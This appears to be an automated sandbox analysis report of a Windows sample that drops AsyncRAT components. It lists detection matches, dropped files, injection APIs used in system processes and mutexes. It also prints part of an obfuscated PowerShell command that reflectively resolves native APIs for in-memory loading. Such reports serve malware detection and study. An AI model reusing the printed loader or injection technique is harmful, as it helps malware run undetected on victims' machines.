Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: unknown Process created: Commandline size = 5205
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E0F2 NtWriteVirtualMemory, 3_2_00007FFD9B87E0F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E112 NtSetContextThread, 3_2_00007FFD9B87E112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E132 NtResumeThread, 3_2_00007FFD9B87E132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E0D2 NtUnmapViewOfSection, 3_2_00007FFD9B87E0D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880FF4 NtResumeThread, 3_2_00007FFD9B880FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880F30 NtSetContextThread, 3_2_00007FFD9B880F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880A4E NtUnmapViewOfSection, 3_2_00007FFD9B880A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E122 NtSetContextThread, 3_2_00007FFD9B87E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880C6D NtWriteVirtualMemory, 3_2_00007FFD9B880C6D
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001868 OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle, 5_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC642964 NtEnumerateValueKey,NtEnumerateValueKey, 6_2_00000225DC642964
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE25CC NtQueryDirectoryFileEx,GetFileType,StrCpyW, 7_2_00000202C0AE25CC
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE20E4 NtQuerySystemInformation,StrCmpNIW, 7_2_00000202C0AE20E4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE262964 NtEnumerateValueKey,NtEnumerateValueKey, 9_2_000002BAAE262964
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_p0mqc12a.0ea.ps1
Source: C:\Users\user\Desktop\x433.exe Code function: 0_2_00007FFD9B890B95 0_2_00007FFD9B890B95
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042BDF6 1_2_0042BDF6
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A00D9 1_2_007A00D9
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A515C 1_2_007A515C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007651EE 1_2_007651EE
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A39A3 1_2_007A39A3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00766EAF 1_2_00766EAF
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00795980 1_2_00795980
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00767B71 1_2_00767B71
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0079D580 1_2_0079D580
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0079C7F0 1_2_0079C7F0
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00767F80 1_2_00767F80
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00793780 1_2_00793780
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B886BF2 2_2_00007FFD9B886BF2
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B8816D9 2_2_00007FFD9B8816D9
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B885E46 2_2_00007FFD9B885E46
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B882111 2_2_00007FFD9B882111
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B88D88A 2_2_00007FFD9B88D88A
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B889A20 2_2_00007FFD9B889A20
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B88BE28 2_2_00007FFD9B88BE28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87DD68 3_2_00007FFD9B87DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E339 3_2_00007FFD9B87E339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BB13449 3_2_00007FFD9BB13449
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A441F8 5_3_000002D8B0A441F8
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A3DA30 5_3_000002D8B0A3DA30
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A31FC8 5_3_000002D8B0A31FC8
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001CF0 5_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002D4C 5_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002434 5_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400031D0 5_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001274 5_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A74DF8 5_2_000002D8B0A74DF8
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 5_2_000002D8B0A6E630
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A62BC8 5_2_000002D8B0A62BC8
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC6241F8 6_3_00000225DC6241F8
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC61DA30 6_3_00000225DC61DA30
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC611FC8 6_3_00000225DC611FC8
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC654DF8 6_2_00000225DC654DF8
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 6_2_00000225DC64E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC642BC8 6_2_00000225DC642BC8
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0AC41F8 7_3_00000202C0AC41F8
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0ABDA30 7_3_00000202C0ABDA30
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0AB1FC8 7_3_00000202C0AB1FC8
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AF4DF8 7_2_00000202C0AF4DF8
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 7_2_00000202C0AEE630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE2BC8 7_2_00000202C0AE2BC8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612D1FC8 8_3_000002A6612D1FC8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612E41F8 8_3_000002A6612E41F8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612DDA30 8_3_000002A6612DDA30
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661302BC8 8_2_000002A661302BC8
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661314DF8 8_2_000002A661314DF8
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE2441F8 9_3_000002BAAE2441F8
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE23DA30 9_3_000002BAAE23DA30
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE231FC8 9_3_000002BAAE231FC8
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE274DF8 9_2_000002BAAE274DF8
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 9_2_000002BAAE26E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE262BC8 9_2_000002BAAE262BC8
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A8799DA30 10_3_0000026A8799DA30
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A879A41F8 10_3_0000026A879A41F8
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A87991FC8 10_3_0000026A87991FC8
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C2BC8 10_2_0000026A879C2BC8
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879D4DF8 10_2_0000026A879D4DF8
Source: C:\Windows\System32\svchost.exe Code function: 11_3_000001795377DA30 11_3_000001795377DA30
Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000179537841F8 11_3_00000179537841F8
Source: C:\Windows\System32\svchost.exe Code function: 11_3_0000017953771FC8 11_3_0000017953771FC8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 11_2_00000179537AE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537B4DF8 11_2_00000179537B4DF8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A2BC8 11_2_00000179537A2BC8
Source: x4Shellcode.exe.0.dr Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamex4host.exe4 vs x433.exe
Source: x433.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: x4Shellcode.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: x433.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: x433.exe, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x433.exe, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Security.evtx.16.dr Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeZX**
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exez
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Security.evtx.16.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exep
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.16.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: System.evtx.16.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exed
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exec
Source: System.evtx.16.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.16.dr Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeW
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeV
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeU
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.16.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeN
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/70@2/4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 5_2_0000000140002D4C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0040151A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,SysFreeString,SysFreeString,SysFreeString, 1_2_0040151A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 1_2_004017A5
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 1_2_0078CBD0
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x433.exe.log
Source: C:\Users\user\AppData\Local\x4usb.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a36-inf
Source: C:\Users\user\Desktop\x433.exe Mutant created: \Sessions\1\BaseNamedObjects\St48A49HT4eAEQEuH
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a367d8e3ee9-b
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Mutant created: \Sessions\1\BaseNamedObjects\W30TmOEkpxCork0C
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe
Source: x433.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x433.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\x433.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\x433.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: x433.exe ReversingLabs: Detection: 76%
Source: unknown Process created: C:\Users\user\Desktop\x433.exe "C:\Users\user\Desktop\x433.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](1
03)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}
Source: unknown Process created: C:\Users\user\AppData\Local\x4usb.exe "C:\Users\user\AppData\Local\x4usb.exe"
Source: C:\Users\user\Desktop\x433.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: version.dll
